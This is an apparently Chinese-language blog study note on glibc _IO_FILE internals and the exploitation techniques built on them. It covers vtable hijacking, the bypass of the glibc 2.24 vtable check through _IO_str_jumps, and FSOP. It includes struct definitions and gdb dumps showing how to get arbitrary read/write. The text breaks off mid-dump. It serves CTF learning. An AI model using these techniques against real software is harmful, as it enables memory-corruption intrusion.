
 <!DOCTYPE HTML>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>IO_FILE structure used with &#34;stream functions&#34; | p1Kk&#39;s World!</title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="p1Kk">
    

    
    <meta name="description" content="emmm因为一道题，看了orange，不够透彻，还需要结合IO流….wiki…好重要喔 FILE结构FILE结构在程序执行fopen等函数时会进行创建，并分配在堆中。FILE结构如下： 123456789101112131415161718192021222324252627282930313233343536373839404142struct _IO_FILE &amp;#123;  int _fla">
<meta name="keywords" content="pwn,笔记,IO">
<meta property="og:type" content="article">
<meta property="og:title" content="IO_FILE structure used with &quot;stream functions&quot;">
<meta property="og:url" content="p1Kk.github.io/2019/10/21/FILE structure used with “stream functions”/IO/FILE structure used with “stream functions”/index.html">
<meta property="og:site_name" content="p1Kk&#39;s World!">
<meta property="og:description" content="emmm因为一道题，看了orange，不够透彻，还需要结合IO流….wiki…好重要喔 FILE结构FILE结构在程序执行fopen等函数时会进行创建，并分配在堆中。FILE结构如下： 123456789101112131415161718192021222324252627282930313233343536373839404142struct _IO_FILE &amp;#123;  int _fla">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://i.loli.net/2019/10/25/fqRF9BCrcNoLmhb.jpg">
<meta property="og:updated_time" content="2019-10-27T12:14:29.380Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="IO_FILE structure used with &quot;stream functions&quot;">
<meta name="twitter:description" content="emmm因为一道题，看了orange，不够透彻，还需要结合IO流….wiki…好重要喔 FILE结构FILE结构在程序执行fopen等函数时会进行创建，并分配在堆中。FILE结构如下： 123456789101112131415161718192021222324252627282930313233343536373839404142struct _IO_FILE &amp;#123;  int _fla">
<meta name="twitter:image" content="https://i.loli.net/2019/10/25/fqRF9BCrcNoLmhb.jpg">

    
    <link rel="alternative" href="atom.xml" title="p1Kk&#39;s World!" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/site.jpg">
    
    
    <link rel="apple-touch-icon" href="/img/head.png">
    <link rel="apple-touch-icon-precomposed" href="/img/head.png">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      
<div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo2.jpg" alt="p1Kk&#39;s World!" title="p1Kk&#39;s World!"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="p1Kk&#39;s World!">p1Kk&#39;s World!</a></h1>
				<h2 class="blog-motto">艺无止境，功不唐捐。</h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
						<li><a href="/about">About</a></li>
					
						<li><a href="/tags">Tags</a></li>
					
						<li><a href="/categories">Categories</a></li>
					
					<li>
 					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="search" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:p1Kk.github.io">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	
	  <article itemprop="articleBody"> 
		  <header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2019/10/21/FILE structure used with “stream functions”/IO/FILE structure used with “stream functions”/" title="IO_FILE structure used with &#34;stream functions&#34;" itemprop="url">IO_FILE structure used with &#34;stream functions&#34;</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="p1Kk" target="_blank" itemprop="author">p1Kk</a>
		
  <p class="article-time">
    <time datetime="2019-10-21T14:06:41.270Z" itemprop="datePublished"> Published 2019-10-21</time>
    
  </p>
</header>
	  <div class="article-content">
		  
		  <div id="toc" class="toc-article">
			  <strong class="toc-title">Contents</strong>
		  
			  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#FILE结构"><span class="toc-number">1.</span> <span class="toc-text">FILE结构</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#fread"><span class="toc-number">1.1.</span> <span class="toc-text">fread</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fwrite"><span class="toc-number">1.2.</span> <span class="toc-text">fwrite</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fopen"><span class="toc-number">1.3.</span> <span class="toc-text">fopen</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fclose"><span class="toc-number">1.4.</span> <span class="toc-text">fclose</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#printf-puts"><span class="toc-number">1.5.</span> <span class="toc-text">printf\puts</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#新版本glibc-libc2-24-下IO-FILE的利用"><span class="toc-number">2.</span> <span class="toc-text">新版本glibc(libc2.24)下IO_FILE的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#原理"><span class="toc-number">2.1.</span> <span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#引例"><span class="toc-number">2.1.1.</span> <span class="toc-text">引例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IO-str-jumps-gt-overflow"><span class="toc-number">2.2.</span> <span class="toc-text">_IO_str_jumps -&gt; overflow</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IO-str-jumps-gt-finish"><span class="toc-number">2.3.</span> <span class="toc-text">_IO_str_jumps -&gt; finish</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#libc2-23及之前版本的libc下伪造vtable劫持"><span class="toc-number">3.</span> <span class="toc-text">libc2.23及之前版本的libc下伪造vtable劫持</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#原理-1"><span class="toc-number">3.1.</span> <span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#引例-1"><span class="toc-number">3.1.1.</span> <span class="toc-text">引例</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#FSOP（File-Stream-Oriented-Programming）"><span class="toc-number">4.</span> <span class="toc-text">FSOP（File Stream Oriented Programming）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#原理-2"><span class="toc-number">4.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用条件"><span class="toc-number">4.2.</span> <span class="toc-text">利用条件</span></a></li></ol></li></ol>
		  
		  </div>
		  
		  <p>emmm因为一道题，看了orange，不够透彻，还需要结合IO流….wiki…好重要喔</p>
<h1 id="FILE结构"><a href="#FILE结构" class="headerlink" title="FILE结构"></a>FILE结构</h1><p>FILE结构在程序执行fopen等函数时会进行创建，并分配在<strong>堆</strong>中。<br>FILE结构如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">struct _IO_FILE &#123;</span><br><span class="line">  int _flags;       /* High-order word is _IO_MAGIC; rest is flags. */</span><br><span class="line">#define _IO_file_flags _flags</span><br><span class="line"></span><br><span class="line">  /* The following pointers correspond to the C++ streambuf protocol. */</span><br><span class="line">  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */</span><br><span class="line">  char* _IO_read_ptr;   /* Current read pointer */</span><br><span class="line">  char* _IO_read_end;   /* End of get area. */</span><br><span class="line">  char* _IO_read_base;  /* Start of putback+get area. */</span><br><span class="line">  char* _IO_write_base; /* Start of put area. */</span><br><span class="line">  char* _IO_write_ptr;  /* Current put pointer. */</span><br><span class="line">  char* _IO_write_end;  /* End of put area. */</span><br><span class="line">  char* _IO_buf_base;   /* Start of reserve area. */</span><br><span class="line">  char* _IO_buf_end;    /* End of reserve area. */</span><br><span class="line">  /* The following fields are used to support backing up and undo. */</span><br><span class="line">  char *_IO_save_base; /* Pointer to start of non-current get area. */</span><br><span class="line">  char *_IO_backup_base;  /* Pointer to first valid character of backup area */</span><br><span class="line">  char *_IO_save_end; /* Pointer to end of non-current get area. */</span><br><span class="line"></span><br><span class="line">  struct _IO_marker *_markers;</span><br><span class="line"></span><br><span class="line">  struct _IO_FILE *_chain;</span><br><span class="line"></span><br><span class="line">  int _fileno;</span><br><span class="line">#if 0</span><br><span class="line">  int _blksize;</span><br><span class="line">#else</span><br><span class="line">  int _flags2;</span><br><span class="line">#endif</span><br><span class="line">  _IO_off_t _old_offset; /* This used to be _offset but it&apos;s too small.  */</span><br><span class="line"></span><br><span class="line">#define __HAVE_COLUMN /* temporary */</span><br><span class="line">  /* 1+column number of pbase(); 0 is unknown. */</span><br><span class="line">  unsigned short _cur_column;</span><br><span class="line">  signed char _vtable_offset;</span><br><span class="line">  char _shortbuf[1];</span><br><span class="line"></span><br><span class="line">  /*  char* _save_gptr;  char* _save_egptr; */</span><br><span class="line"></span><br><span class="line">  _IO_lock_t *_lock;</span><br><span class="line">#ifdef _IO_USE_OLD_IO_FILE</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>进程中的FILE结构会通过_chain域彼此连接形成一个链表，链表头部用全局变量_IO_list_all表示。通过这个值我们可以遍历所有的FILE结构。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">_IO_2_1_stderr_</span><br><span class="line">_IO_2_1_stdout_</span><br><span class="line">_IO_2_1_stdin_</span><br></pre></td></tr></table></figure>

<p>这三个文件流位于libc.so的数据段，而我们的fopen创建的文件流是分配在堆内存上的。<br><strong>_IO_FILE结构外包裹着另一种结构_IO_FILE_plus，其中包含了重要的指针<code>vtable</code>，指向了一系列函数指针。</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">struct _IO_FILE_plus</span><br><span class="line">&#123;</span><br><span class="line">    _IO_FILE    file;</span><br><span class="line">    IO_jump_t   *vtable;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>vtable</code>是IO_jump_t类型的指针，IO_jump_t中保存了一些函数指针。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">void * funcs[] = &#123;</span><br><span class="line">   1 NULL, // &quot;extra word&quot;</span><br><span class="line">   2 NULL, // DUMMY</span><br><span class="line">   3 exit, // finish</span><br><span class="line">   4 NULL, // overflow</span><br><span class="line">   5 NULL, // underflow</span><br><span class="line">   6 NULL, // uflow</span><br><span class="line">   7 NULL, // pbackfail</span><br><span class="line">   </span><br><span class="line">   8 NULL, // xsputn  #printf</span><br><span class="line">   9 NULL, // xsgetn</span><br><span class="line">   10 NULL, // seekoff</span><br><span class="line">   11 NULL, // seekpos</span><br><span class="line">   12 NULL, // setbuf</span><br><span class="line">   13 NULL, // sync</span><br><span class="line">   14 NULL, // doallocate</span><br><span class="line">   15 NULL, // read</span><br><span class="line">   16 NULL, // write</span><br><span class="line">   17 NULL, // seek</span><br><span class="line">   18 pwn,  // close</span><br><span class="line">   19 NULL, // stat</span><br><span class="line">   20 NULL, // showmanyc</span><br><span class="line">   21 NULL, // imbue</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<h2 id="fread"><a href="#fread" class="headerlink" title="fread"></a>fread</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">size_t fread ( void *buffer, size_t size, size_t count, FILE *stream) ;</span><br></pre></td></tr></table></figure>

<ul>
<li>从stream文件流中读取count个到buffer<br>size指定每个记录的长度，返回读取到缓冲区的记录个数</li>
</ul>
<p><code>_IO_fread</code> –&gt; 【<code>_IO_FILE_plus.vtable</code> –&gt; <code>_IO_sgetn</code>】 –&gt; <code>_IO_file_xsgetn</code></p>
<h2 id="fwrite"><a href="#fwrite" class="headerlink" title="fwrite"></a>fwrite</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">size_t fwrite(const void* buffer, size_t size, size_t count, FILE* stream);</span><br></pre></td></tr></table></figure>

<ul>
<li>把buffer指向的数组中的数据写入 size字节数据项的个数count个 到给定流steam中，如果成功，返回count</li>
</ul>
<p><code>_IO_fwrite</code> –&gt; 【<code>_IO_FILE_plus.vtable</code> –&gt; <code>_IO_xsputn</code>】 –&gt; <code>_IO_new_file_xsputn</code> –&gt; <code>_IO_overflow</code> –&gt; <code>_IO_new_file_overflow</code> –&gt; <code>write</code></p>
<h2 id="fopen"><a href="#fopen" class="headerlink" title="fopen"></a>fopen</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">FILE *fopen(char *filename, *type);</span><br></pre></td></tr></table></figure>

<ul>
<li>从filename路径以type类型打开目标文件，返回一个文件指针</li>
</ul>
<p><code>__fopen_internal</code> –&gt; <code>malloc</code> 分配FILE结构<br><code>_IO_file_init</code>进一步初始化 –&gt; <code>_IO_link_in</code>把新分配的FILE链入<code>_IO_list_all</code>为起始的FILE链表<br><code>__fopen_internal</code> –&gt; <code>_IO_file_fopen</code>打开目标文件 –&gt; <code>open</code></p>
<h2 id="fclose"><a href="#fclose" class="headerlink" title="fclose"></a>fclose</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">int fclose(FILE *stream)</span><br></pre></td></tr></table></figure>

<ul>
<li>关闭文件流，把缓冲区内最后剩余的数据输出到磁盘文件中，并释放文件指针和有关的缓冲区</li>
</ul>
<p><code>_IO_unlink_it</code>将指定FILE从_chain链表中脱链<br><code>_IO_file_close_it</code> –&gt; <code>close</code> –&gt; 【vtable中<code>_IO_finish</code> –&gt; <code>_IO_file_finish</code> –&gt; <code>free</code>】</p>
<h2 id="printf-puts"><a href="#printf-puts" class="headerlink" title="printf\puts"></a>printf\puts</h2><p>在 printf 的参数是以’\n’结束的纯字符串时，<code>printf</code>会被优化为<code>puts</code>函数并去除换行符。<br>printf：<code>vfprintf+11</code> –&gt; <code>_IO_file_xsputn</code> –&gt; <code>_IO_file_overflow</code> –&gt; <code>funlockfile</code> –&gt; <code>_IO_file_write</code> –&gt; <code>write</code><br>puts：<code>_IO_puts</code> –&gt; 【<code>_IO_FILE_plus.vtable</code> –&gt; <code>_IO_xsputn</code>】 –&gt; <code>_IO_new_file_xsputn</code> –&gt; <code>_IO_overflow</code> –&gt; <code>_IO_new_file_overflow</code> –&gt; <code>write</code></p>
<hr>
<ul>
<li>以下的利用方法都可以选择一道题来做，只是在不同的libc版本下测试利用就可以学习很多=。=</li>
</ul>
<hr>
<h1 id="新版本glibc-libc2-24-下IO-FILE的利用"><a href="#新版本glibc-libc2-24-下IO-FILE的利用" class="headerlink" title="新版本glibc(libc2.24)下IO_FILE的利用"></a>新版本glibc(libc2.24)下IO_FILE的利用</h1><p>在glibc2.24种，全新加入了针对<code>IO_FILE_plus</code>的<code>vtable</code>劫持的检测措施：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">验证vtable是否位于_IO_vtable段中</span><br><span class="line">- 满足：正常执行</span><br><span class="line">- 不满足：调用_IO_vtable_check做进一步检查</span><br><span class="line">    -- 合法：正常执行（这个我不大确定是否正常...</span><br><span class="line">    -- 非法：引发abort</span><br></pre></td></tr></table></figure>

<p>【具体如何检查可以看源码，以后（可能）会学习一些堆方面的源码分析，这里不再赘述。】<br>所以这些check使得使用vtable利用的技术难以实现，这怎么会难倒爷爷们呢，所以就出现了新的利用技术(●’◡’●)</p>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>_IO_FILE中有一些域辉表示调用诸如fwrite、fread等函数的写入地址或读取地址，如果控制这些数据，就可以实现任意地址写或任意地址读。<br>进程中包含了系统默认的三个文件流stdin\stdout\stderr，因此这种方式可以不需要进程中存在文件操作，通过scanf\printf一样可以进行利用。<br>在_IO_FILE中<code>_IO_buf_base</code>表示操作的起始地址，<code>_IO_buf_end</code>表示结束地址，所以通过控制这两个数据来实现控制读写的操作。</p>
<h3 id="引例"><a href="#引例" class="headerlink" title="引例"></a>引例</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#include &quot;stdio.h&quot;</span><br><span class="line"></span><br><span class="line">char buf[100];</span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line"> char stack_buf[100];</span><br><span class="line"> scanf(&quot;%s&quot;,stack_buf);</span><br><span class="line"> scanf(&quot;%s&quot;,stack_buf);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>gdb调试</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">0x7ffff7dd18e0 &lt;_IO_2_1_stdin_&gt;:	0x00000000fbad2088	0x0000000000000000</span><br><span class="line">0x7ffff7dd18f0 &lt;_IO_2_1_stdin_+16&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1900 &lt;_IO_2_1_stdin_+32&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1910 &lt;_IO_2_1_stdin_+48&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1920 &lt;_IO_2_1_stdin_+64&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1930 &lt;_IO_2_1_stdin_+80&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1940 &lt;_IO_2_1_stdin_+96&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1950 &lt;_IO_2_1_stdin_+112&gt;:	0x0000000000000000	0xffffffffffffffff</span><br><span class="line">0x7ffff7dd1960 &lt;_IO_2_1_stdin_+128&gt;:	0x0000000000000000	0x00007ffff7dd3790</span><br><span class="line">0x7ffff7dd1970 &lt;_IO_2_1_stdin_+144&gt;:	0xffffffffffffffff	0x0000000000000000</span><br><span class="line">0x7ffff7dd1980 &lt;_IO_2_1_stdin_+160&gt;:	0x00007ffff7dd19c0	0x0000000000000000</span><br><span class="line">0x7ffff7dd1990 &lt;_IO_2_1_stdin_+176&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd19a0 &lt;_IO_2_1_stdin_+192&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd19b0 &lt;_IO_2_1_stdin_+208&gt;:	0x0000000000000000	0x00007ffff7dd06e0 ==&gt;vtable</span><br></pre></td></tr></table></figure>

<p>scanf之后，指针出现了变化，但是有没有发现这些地址有些眼熟哦…</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">0x7ffff7dd18e0 &lt;_IO_2_1_stdin_&gt;:	0x00000000fbad2288	0x0000000000602015</span><br><span class="line">0x7ffff7dd18f0 &lt;_IO_2_1_stdin_+16&gt;:	0x0000000000602016	0x0000000000602010</span><br><span class="line">0x7ffff7dd1900 &lt;_IO_2_1_stdin_+32&gt;:	0x0000000000602010	0x0000000000602010</span><br><span class="line">0x7ffff7dd1910 &lt;_IO_2_1_stdin_+48&gt;:	0x0000000000602010	0x0000000000602010 ==&gt; _IO_buf_base</span><br><span class="line">0x7ffff7dd1920 &lt;_IO_2_1_stdin_+64&gt;:	0x0000000000602410 ==&gt; _IO_buf_end 0x0000000000000000</span><br><span class="line">0x7ffff7dd1930 &lt;_IO_2_1_stdin_+80&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1940 &lt;_IO_2_1_stdin_+96&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1950 &lt;_IO_2_1_stdin_+112&gt;:	0x0000000000000000	0xffffffffffffffff</span><br><span class="line">0x7ffff7dd1960 &lt;_IO_2_1_stdin_+128&gt;:	0x0000000000000000	0x00007ffff7dd3790</span><br><span class="line">0x7ffff7dd1970 &lt;_IO_2_1_stdin_+144&gt;:	0xffffffffffffffff	0x0000000000000000</span><br><span class="line">0x7ffff7dd1980 &lt;_IO_2_1_stdin_+160&gt;:	0x00007ffff7dd19c0	0x0000000000000000</span><br><span class="line">0x7ffff7dd1990 &lt;_IO_2_1_stdin_+176&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd19a0 &lt;_IO_2_1_stdin_+192&gt;:	0x00000000ffffffff	0x0000000000000000</span><br><span class="line">0x7ffff7dd19b0 &lt;_IO_2_1_stdin_+208&gt;:	0x0000000000000000	0x00007ffff7dd06e0</span><br></pre></td></tr></table></figure>

<p>可以看出这些初始化的内存是从<strong>堆</strong>中分配出来的，这也映证了前文的FILE结构<br>_IO_buf_base 与 _IO_buf_end相差了0x400个字节，所以分配的堆大小是0x400</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; vmmap</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">          0x400000           0x401000 r-xp     1000 0      /home/kk/Desktop/black/wiki/io_file/libc24/test</span><br><span class="line">          0x600000           0x601000 r--p     1000 0      /home/kk/Desktop/black/wiki/io_file/libc24/test</span><br><span class="line">          0x601000           0x602000 rw-p     1000 1000   /home/kk/Desktop/black/wiki/io_file/libc24/test</span><br><span class="line">          0x602000           0x623000 rw-p    21000 0      [heap]</span><br></pre></td></tr></table></figure>

<p>查看堆缓冲区有我写入的<code>kkkkk</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/4gx 0x602000</span><br><span class="line">0x602000:	0x0000000000000000	0x0000000000000411 ==&gt;大小</span><br><span class="line">0x602010:	0x00000a6b6b6b6b6b	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>栈缓冲区<code>stack_buf</code>中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/10gx 0x7fffffffddd0</span><br><span class="line">0x7fffffffddd0:	0x0000006b6b6b6b6b ==&gt; 数据 0x00007fffffffdf38</span><br><span class="line">0x7fffffffdde0:	0x0000000000000001	0x00007fffffffde60</span><br><span class="line">0x7fffffffddf0:	0x00007ffff7ffe168	0x0000000000f0b5ff</span><br><span class="line">0x7fffffffde00:	0x0000000000000001	0x000000000040066d</span><br><span class="line">0x7fffffffde10:	0x00007fffffffde3e	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>全局变量<code>buf</code>中，空空如也。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/10gx 0x601060</span><br><span class="line">0x601060 &lt;buf&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x601070 &lt;buf+16&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x601080 &lt;buf+32&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x601090 &lt;buf+48&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6010a0 &lt;buf+64&gt;:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>第二次的scanf，我写入<code>aaaa</code><br>此时</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/4gx 0x602000</span><br><span class="line">0x602000:	0x0000000000000000	0x0000000000000411</span><br><span class="line">0x602010:	0x00000a0a61616161	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>那么我们通过修改<code>_IO_buf_base</code>和<code>_IO_buf_end</code>就可以实现任意地址读写。<br>可是怎么修改啊…</p>
<p><img src="https://i.loli.net/2019/10/25/fqRF9BCrcNoLmhb.jpg" alt="78PVL}DCCGGZF755_Q1D4V3.jpg"></p>
<blockquote>
<p>libc的vtable==&gt;<code>_IO_file_jumps</code>被检查，而<code>_IO_str_jumps</code>不在检查范围</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p _IO_str_jumps </span><br><span class="line">$1 = &#123;</span><br><span class="line">  __dummy = 0, </span><br><span class="line">  __dummy2 = 0, </span><br><span class="line">  __finish = 0x7ffff7a89fa0 &lt;_IO_str_finish&gt;,       ==&gt;🚩</span><br><span class="line">  __overflow = 0x7ffff7a89c80 &lt;__GI__IO_str_overflow&gt;,      ==&gt;🚩</span><br><span class="line">  __underflow = 0x7ffff7a89c20 &lt;__GI__IO_str_underflow&gt;, </span><br><span class="line">  __uflow = 0x7ffff7a88600 &lt;__GI__IO_default_uflow&gt;, </span><br><span class="line">  __pbackfail = 0x7ffff7a89f80 &lt;__GI__IO_str_pbackfail&gt;, </span><br><span class="line">  __xsputn = 0x7ffff7a88630 &lt;__GI__IO_default_xsputn&gt;, </span><br><span class="line">  __xsgetn = 0x7ffff7a88710 &lt;__GI__IO_default_xsgetn&gt;, </span><br><span class="line">  __seekoff = 0x7ffff7a8a0d0 &lt;__GI__IO_str_seekoff&gt;, </span><br><span class="line">  __seekpos = 0x7ffff7a88a00 &lt;_IO_default_seekpos&gt;, </span><br><span class="line">  __setbuf = 0x7ffff7a88930 &lt;_IO_default_setbuf&gt;, </span><br><span class="line">  __sync = 0x7ffff7a88c00 &lt;_IO_default_sync&gt;, </span><br><span class="line">  __doallocate = 0x7ffff7a88a20 &lt;__GI__IO_default_doallocate&gt;, </span><br><span class="line">  __read = 0x7ffff7a89ad0 &lt;_IO_default_read&gt;, </span><br><span class="line">  __write = 0x7ffff7a89ae0 &lt;_IO_default_write&gt;, </span><br><span class="line">  __seek = 0x7ffff7a89ab0 &lt;_IO_default_seek&gt;, </span><br><span class="line">  __close = 0x7ffff7a88c00 &lt;_IO_default_sync&gt;, </span><br><span class="line">  __stat = 0x7ffff7a89ac0 &lt;_IO_default_stat&gt;, </span><br><span class="line">  